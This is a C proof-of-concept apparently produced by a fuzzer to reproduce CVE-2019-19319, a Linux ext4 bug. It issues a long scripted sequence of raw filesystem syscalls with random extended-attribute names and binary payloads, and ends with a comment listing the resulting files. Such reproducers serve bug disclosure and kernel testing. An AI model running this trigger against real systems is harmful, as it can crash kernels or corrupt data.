CVE-2019-19319/poc_2019_19319.c

#include <sys/types.h>
#include <sys/mount.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/xattr.h>
#include <sys/syscall.h>

#include <dirent.h>
#include <errno.h>
#include <error.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
	unsigned char v0[8192];
	unsigned char v1[8192];
	char v2[] = ".";
	char v3[] = "foo";
	char v4[] = "foo/bar";
	char v5[] = "foo/bar/hln";
	char v6[] = "foo/bar/baz";
	char v7[] = "foo/bar/æøå";
	char v8[] = "foo/bar/xattr";
	char v9[] = "foo/bar/acl";
	char v10[] = "foo/bar/sln";
	char v11[] = "foo/bar/fifo";
	char v12[] = "lost+found";
	long v13;
	char v14[] = "lost+found/fJLYRVuw";
	unsigned char v15[127];
	memcpy(v15, "\x71\x4c\x82\x22\x47\x29\x74\xc8\xab\xca\xaf\x94\xf6\xad\xb8\xa7\x71\xfb\x14\xcc\xd4\xa7\xf0\x22\x70\x39\x1d\x1f\x6a\x3e\xf8\xdb\x8a\x7b\xfd\x51\xa4\xf1\x1b\xcf\x3d\xca\xe4\x34\xf7\x1d\xdb\xe8\x19\x6f\xb5\x6e\x96\xa6\x90\x08\x5f\xad\x27\xc9\x6b\x21\x25\x76\x1c\xa3\xc7\xc1\x95\xe2\x11\xd2\x2d\x75\x86\x25\x93\x62\x0e\x2c\x52\x44\x9a\xe8\xea\x2c\xf0\x4b\x59\x98\x94\xc5\x39\xba\xbb\x55\x5e\x83\x96\x73\xe6\x28\x47\x14\x9d\xcd\xb9\xb0\xb0\x47\xdd\x03\x8b\xf7\x6b\xf6\xa3\xdc\x42\xfd\x75\x56\x43\x2e\x11\x7e\x83", 127);
	char v16[] = "security.PJszeqyM";
	unsigned char v17[97];
	memcpy(v17, "\x42\x09\x68\x98\xcb\x96\x2a\x4a\x1a\x19\x4c\xb4\xfb\x35\xf6\x26\x32\xd7\x9e\xe7\x69\x46\x65\x58\x71\x6e\xbe\x87\x6e\x4a\xfa\x30\xd2\x63\xc9\x9e\xf9\x73\xe8\x93\x0c\xb5\x49\x09\xea\x40\x2f\x9c\x18\x4d\x84\x01\x14\x69\xd8\x05\x58\x98\x8c\xc6\xe2\x87\xf7\x36\x6a\x41\xd4\x64\xb4\xbe\xf7\xc0\x74\xc0\x49\xde\x81\xf8\xfa\x19\x46\xfe\x1b\xd9\x68\xf3\xde\x40\x8c\xea\x08\xef\x72\x7f\x26\xdc\xc0", 97);
	char v18[] = "security.ima";
	unsigned char v19[65];
	memcpy(v19, "\x35\x2d\xf9\x7f\x8b\xfa\xf7\x86\x15\xbd\x85\x30\x98\x6e\xa3\xf6\xae\xb0\xe2\x36\xa0\x55\xb5\x46\xb2\xf5\xc0\xf2\x6a\x7a\x2c\x20\x27\xa6\x1f\xb3\xa1\x17\xb9\xb6\xd4\x40\x66\x6d\x2e\x0b\x65\xdc\xbb\x48\x14\xdb\x1d\x49\xa1\x4f\x40\x62\x43\xaa\x5c\xee\xca\x04\x95", 65);
	char v20[] = "trusted.WDGDtEEF";
	unsigned char v21[121];
	memcpy(v21, "\x0e\x1a\x19\x5d\xd9\xfa\x20\x05\x58\x10\x4f\x5c\x25\xb9\x93\xdc\x3a\x84\x4c\x90\x36\xa1\xd4\x95\x02\xfc\x52\x9d\xed\xa2\x94\xfb\x3d\xad\xd8\x17\xa8\x79\x1c\x80\x09\x6c\x5c\x2e\x26\x6f\x0c\xdf\xf4\xd7\xf0\x2b\x79\x45\x40\xfa\x42\x13\x18\xaf\xb5\xac\x2b\xf2\xd9\x84\x0b\x02\xfd\xa6\x03\x86\x92\x5f\xb4\x38\x4f\x40\x19\xc3\x18\x0a\x6e\x11\x4f\xae\x8b\x11\x41\x23\x41\xf7\x4f\x6c\x6a\x29\x70\xf4\x2c\x6e\x9c\xae\xf4\x2f\x8d\x2a\xe7\xdc\x6a\x01\xa0\x03\x8a\x0f\x93\x59\x3e\x9f\xe9\x7f\xc2", 121);
	char v22[] = "security.ima";
	char v23[] = "user.G23W1Rip";
	char v24[] = "foo/z5NkeKcl";
	unsigned char v25[57];
	memcpy(v25, "\x67\x29\xda\xe5\x79\x39\xa7\xf4\xfc\x7d\xe5\x1f\x3d\x8d\xeb\xf9\x3a\x77\x8e\x9d\xc7\xf7\x70\x48\xd0\x2e\x6b\xa0\x3b\xd5\x82\x23\x7e\xdd\x09\x77\x17\x31\x6c\x14\xae\xd1\xb3\x6b\xdf\x1f\x66\x1a\x96\xf4\x37\xde\x6c\x27\x27\xbd\xd5", 57);
	char v26[] = "user.sslab";
	unsigned char v27[4];
	memcpy(v27, "\x3e\xbd\x5d\x56", 4);
	char v28[] = "user.dYhdN9MX";
	char v29[] = "security.PJszeqyM";
	char v30[] = "foo/z5NkeKcl/8AjrqxrK";
	unsigned char v31[106];
	memcpy(v31, "\x0d\x25\x86\x60\x18\x90\xb1\x0e\x4a\x92\x7e\x5f\xe8\x08\x80\xad\x3e\xc7\x39\xc9\x20\xbf\x8e\x76\x37\x5e\x67\x93\x20\xb9\xa0\x2e\xde\x27\x0e\x76\xb7\x3f\x84\x81\x51\x04\xe0\x3a\x8b\xe0\xe8\xca\xa8\xa1\x14\x49\x61\x22\x3f\x18\x80\xa6\xac\xa1\x60\x4d\x4f\xbe\xf3\x5d\x35\x2b\x9c\x39\xac\xed\xbc\x8e\x29\x49\xee\x91\x14\x98\x33\x28\x61\x14\xc9\xa0\xac\x4b\x47\x59\x6c\x27\x26\xbb\xe5\x1a\x98\x9a\x45\x35\xd3\x71\xa2\x91\x7f\xcb", 106);
	char v32[] = "trusted.glgGHfG1";
	char v33[] = "trusted.sslab";
	char v34[] = "user.sslab";
	char v35[] = "trusted.WDGDtEEF";
	unsigned char v36[128];
	memcpy(v36, "\x92\xf2\x2e\x82\xba\x5b\xe3\x6a\x15\x10\xb6\xc1\x90\xd6\x02\x6a\xf7\x94\x26\x7b\x1b\xf0\xcb\xab\xed\xf6\x2f\x38\xd7\x2a\x3b\xe9\x9c\xe8\xec\x57\x44\xd0\x42\xd9\xe0\xf8\x9b\xf0\xcf\x1d\x5b\x47\x31\x01\xc2\x4c\xf1\x0e\xf8\xdf\x05\xa7\x97\x5d\xd1\xd2\x47\xed\x3c\x34\x46\x80\x05\x08\x5a\xe5\x01\x75\x56\x51\x12\x31\x98\x44\x32\xdb\x90\xa4\xe9\x09\x04\xef\x31\x9c\x4d\x03\xee\x94\x71\x2b\x49\xb7\x2c\x4e\x3f\x86\xb4\x40\x7c\x8a\x11\x8e\xbc\xaa\x52\x6e\x06\xe3\x13\xef\x6c\x97\xdf\x9d\x34\x2d\x21\x23\x42\x92\x4f\x0b", 128);
	char v37[] = "trusted.sslab";
	char v38[] = "trusted.NiddTC7V";
	char v39[] = "btrfs.B2NdFGel";
	unsigned char v40[63];
	memcpy(v40, "\x8e\x54\x75\x1b\xa9\xf9\xfa\xed\x84\x3d\x45\xfe\x6c\xb3\x5a\xb9\xd6\xe2\xa6\x1c\xac\x27\xb1\x02\xef\xc0\xb0\x42\xd1\x6c\xdc\x61\x41\xd1\x7c\xea\xcb\xf6\x58\x50\x35\x9d\xce\x21\xd0\xa9\x5a\xa7\x8c\x02\x44\x39\xa8\x75\x3b\x18\x36\x6b\xd9\x09\x58\xb6\x6a", 63);
	char v41[] = "user.dYhdN9MX";
	char v42[] = "./fsbp8dE1";
	char v43[] = "./eztJZoh7";
	long v44;
	char v45[] = "system.posix_acl_access";
	char v46[] = "foo/z5NkeKcl/zh6HmsuT";
	long v47;
	char v48[] = "system.posix_acl_access";
	unsigned char v49[91];
	memcpy(v49, "\x43\x10\xb1\xb5\xb9\xeb\x49\xf8\x9f\x3b\xdb\x3e\xf0\xad\xb4\xa0\x1f\x0d\xc4\x24\x22\x23\x4e\x8a\x54\xc5\x3f\xe0\x45\x20\xb9\x08\xb0\xeb\xbe\xe9\xd7\x08\xe2\x78\x43\xbe\x36\x34\x6d\xea\x54\x0c\x77\x19\xaf\x99\x3d\x7e\xa3\x11\x44\x62\x71\x09\x03\xaa\x12\xb3\x96\xd0\x9d\x6f\xd8\x01\x67\x9b\xbf\x9d\x4f\xac\x88\x24\x38\x7f\x3d\xe8\x99\xf9\xe6\x3d\x0b\x2b\xa0\xfb\xb4", 91);
	char v50[] = "security.selinux";
	unsigned char v51[126];
	memcpy(v51, "\xd3\xb5\x6a\x90\x41\x15\x31\x3d\xc9\x54\xe4\x10\xaa\x24\x27\x9f\x51\x96\x94\x66\x21\xc9\x18\xfb\xac\xd2\x79\xc7\x8c\x35\xca\x60\xeb\x35\xf0\xac\x4a\xa2\xe9\x94\x76\xcf\xa4\x22\x73\xcc\xc1\x44\xe2\xd5\xaa\x05\xa0\x43\x80\xcc\x95\xf9\x14\x22\x30\xde\x02\x9b\x93\xf2\x48\xdd\x15\xb1\xf1\x8c\x81\x17\xae\x74\xe3\xef\xb9\xc6\xc5\xe3\x4b\xe5\xa6\xcb\xb2\x3c\xc6\xc6\xdd\x76\x25\xdf\x91\xb8\xd3\x59\x17\x68\x0b\x09\xf4\x0d\x20\x23\x81\x83\x13\xba\xca\x59\x1f\x16\x3f\x45\xe2\x72\x82\x29\xb8\x60\x9f\xde\x41\xb0", 126);
	char v52[] = "trusted.sslab";
	long v53;
	char v54[] = "security.PUPCnfUb";
	char v55[] = "./SyP7300g";
	char v56[] = "./RUSNtWX9";
	unsigned char v57[47];
	memcpy(v57, "\xc1\xe0\xaa\xb9\xfb\x82\xa3\x15\xb8\x30\x6f\xa8\xf2\xb1\xc8\xa1\x03\x97\x89\x12\x9c\x7d\x46\xa5\xa6\xbb\x57\x77\x3d\xbe\x87\x7e\x20\xb1\xb7\x1c\x34\x5b\x32\xec\x0b\xa1\x15\xfd\xd3\xdd\xa0", 47);
	char v58[] = "security.uaDbzqmt";
	unsigned char v59[69];
	memcpy(v59, "\x9e\x45\xdd\xb3\x44\x31\x91\x64\x87\x07\x0e\xef\x19\x35\x1e\x50\x83\x87\x5e\xc8\x2e\xab\x95\xd3\x19\x14\x32\xa3\x46\xeb\xde\xe4\xb0\x3c\x98\x74\x6d\xaa\xd8\xf4\x31\xe6\x64\x4a\x9c\x82\x9a\x20\x89\x78\x69\x38\x25\xfe\x0c\xbd\x93\xbd\x61\xd9\xa9\xc0\x3f\x5b\xfc\x57\x4f\xea\x02", 69);
	char v60[] = "user.dYhdN9MX";
	v13 = syscall(SYS_open, (long)v2, 65536, 0);
	syscall(SYS_getdents64, (long)v13, (long)v1, 2344);
	syscall(SYS_mkdir, (long)v14);
	syscall(SYS_setxattr, (long)v11, (long)v16, (long)v15, 127, 1);
	syscall(SYS_rmdir, (long)v12);
	syscall(SYS_readlink, (long)v24, (long)v1, 8192);
	syscall(SYS_setxattr, (long)v5, (long)v18, (long)v17, 97, 1);
	syscall(SYS_setxattr, (long)v11, (long)v20, (long)v19, 65, 1);
	syscall(SYS_rmdir, (long)v14);
	syscall(SYS_setxattr, (long)v5, (long)v22, (long)v21, 121, 2);
	syscall(SYS_removexattr, (long)v2, (long)v23);
	syscall(SYS_mkdir, (long)v24);
	syscall(SYS_rename, (long)v10, (long)v5);
	syscall(SYS_setxattr, (long)v2, (long)v26, (long)v25, 57, 1);
	syscall(SYS_rmdir, (long)v4);
	syscall(SYS_setxattr, (long)v24, (long)v28, (long)v27, 4, 1); // 28
	syscall(SYS_removexattr, (long)v11, (long)v29);
	syscall(SYS_mkdir, (long)v30);
	syscall(SYS_rename, (long)v11, (long)v5);
	syscall(SYS_setxattr, (long)v7, (long)v32, (long)v31, 106, 1);
	syscall(SYS_removexattr, (long)v30, (long)v33);
	syscall(SYS_removexattr, (long)v2, (long)v34);
	syscall(SYS_chmod, (long)v30, 3072);
	syscall(SYS_truncate, (long)v5, 369);
	syscall(SYS_removexattr, (long)v5, (long)v35);
	syscall(SYS_truncate, (long)v3, 2426);
	syscall(SYS_setxattr, (long)v2, (long)v37, (long)v36, 128, 1);
	syscall(SYS_removexattr, (long)v5, (long)v38);
	syscall(SYS_chmod, (long)v3, 3072);
	syscall(SYS_removexattr, (long)v30, (long)v39);
	syscall(SYS_setxattr, (long)v24, (long)v41, (long)v40, 63, 2); // here
	syscall(SYS_truncate, (long)v3, 952);
	syscall(SYS_mkdir, (long)v42);
	v44 = syscall(SYS_open, (long)v43, 66, 438);
	syscall(SYS_removexattr, (long)v9, (long)v45);
	syscall(SYS_pwrite64, (long)v44, (long)v1, 2371, 4128);
	syscall(SYS_ftruncate, (long)v44, 6444);
	v47 = syscall(SYS_open, (long)v46, 66, 438);
	syscall(SYS_removexattr, (long)v43, (long)v48);
	syscall(SYS_write, (long)v47, (long)v1, 200);
	syscall(SYS_fdatasync, (long)v47);
	syscall(SYS_pread64, (long)v47, (long)v0, 1644, 7575);
	syscall(SYS_unlink, (long)v5);
	syscall(SYS_setxattr, (long)v24, (long)v50, (long)v49, 91, 1);
	syscall(SYS_fallocate, (long)v44, 65, 183, 4203);
	syscall(SYS_pwrite64, (long)v44, (long)v1, 1583, 102);
	syscall(SYS_ftruncate, (long)v44, 6592);
	syscall(SYS_pwrite64, (long)v44, (long)v1, 2093, 3407);
	syscall(SYS_setxattr, (long)v24, (long)v52, (long)v51, 126, 1);
	v53 = syscall(SYS_open, (long)v8, 2, 0);
	syscall(SYS_ftruncate, (long)v44, 4709);
	syscall(SYS_rmdir, (long)v42);
	syscall(SYS_fdatasync, (long)v53);
	syscall(SYS_removexattr, (long)v46, (long)v54);
	syscall(SYS_pwrite64, (long)v47, (long)v1, 1465, 7077);
	syscall(SYS_pwrite64, (long)v44, (long)v1, 2654, 8050);
	syscall(SYS_syncfs, (long)v44);
	syscall(SYS_mkdir, (long)v55);
	syscall(SYS_read, (long)v44, (long)v0, 3520);
	syscall(SYS_readlink, (long)v8, (long)v1, 8192);
	syscall(SYS_link, (long)v46, (long)v56);
	syscall(SYS_setxattr, (long)v24, (long)v58, (long)v57, 47, 1);
	syscall(SYS_pread64, (long)v47, (long)v0, 1270, 5567);
	syscall(SYS_fallocate, (long)v44, 65, 5990, 2192);
	syscall(SYS_setxattr, (long)v24, (long)v60, (long)v59, 69, 2); // here
	syscall(SYS_pread64, (long)v53, (long)v0, 8192, 6215);

	close(v13);
	close(v44);
	close(v47);
	close(v53);
	return 0;
}
/* Active fds: v13 v44 v47 v53 */
/* Files
Path: .
Type: dir
Xattrs:
name: \x74\x72\x75\x73\x74\x65\x64\x2e\x73\x73\x6c\x61\x62\x00
Path: foo/bar/hln
Type: file
Xattrs:
name: \x73\x65\x63\x75\x72\x69\x74\x79\x2e\x69\x6d\x61\x00
Path: foo/bar/xattr
Type: file
Xattrs:
Path: foo/bar/baz
Type: file
Xattrs:
Path: foo/bar/æøå
Type: file
Xattrs:
name: \x74\x72\x75\x73\x74\x65\x64\x2e\x67\x6c\x67\x47\x48\x66\x47\x31\x00
Path: foo
Type: dir
Xattrs:
Path: foo/z5NkeKcl/zh6HmsuT
Type: file
Xattrs:
Path: foo/bar/acl
Type: file
Xattrs:
Path: ./SyP7300g
Type: dir
Xattrs:
Path: foo/z5NkeKcl
Type: dir
Xattrs:
name: \x74\x72\x75\x73\x74\x65\x64\x2e\x73\x73\x6c\x61\x62\x00
name: \x75\x73\x65\x72\x2e\x64\x59\x68\x64\x4e\x39\x4d\x58\x00
name: \x73\x65\x63\x75\x72\x69\x74\x79\x2e\x73\x65\x6c\x69\x6e\x75\x78\x00
name: \x73\x65\x63\x75\x72\x69\x74\x79\x2e\x75\x61\x44\x62\x7a\x71\x6d\x74\x00
Path: foo/bar/hln
Type: symlink
Xattrs:
Path: foo/z5NkeKcl/8AjrqxrK
Type: dir
Xattrs:
Path: ./eztJZoh7
Type: file
Xattrs:
Path: ./RUSNtWX9
Type: file
Xattrs:
*/